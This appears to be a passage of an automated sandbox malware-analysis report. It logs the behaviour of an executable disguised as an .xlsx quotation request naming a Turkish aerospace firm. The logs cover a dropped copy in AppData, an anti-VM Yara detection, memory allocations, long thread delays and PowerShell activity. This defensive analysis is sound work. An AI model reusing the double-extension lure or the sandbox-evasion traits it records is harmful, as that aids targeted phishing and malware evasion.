Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: xSjByRHuwGV.exe PID: 1936, type: MEMORYSTR

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Memory allocated: 16D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Memory allocated: 30E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Memory allocated: 2EE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Memory allocated: 9170000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Memory allocated: A170000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Memory allocated: A370000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Memory allocated: B370000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Memory allocated: 1630000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Memory allocated: 3070000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Memory allocated: 2EC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Memory allocated: 1750000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Memory allocated: 3350000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Memory allocated: 5350000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Memory allocated: 9210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Memory allocated: 7980000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Memory allocated: A210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Memory allocated: B210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Memory allocated: 2FA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Memory allocated: 3040000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Memory allocated: 5040000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 599813	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 599702	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 599593	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 599484	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 599375	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 599266	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 599120	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 598448	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 598219	Jump to behavior
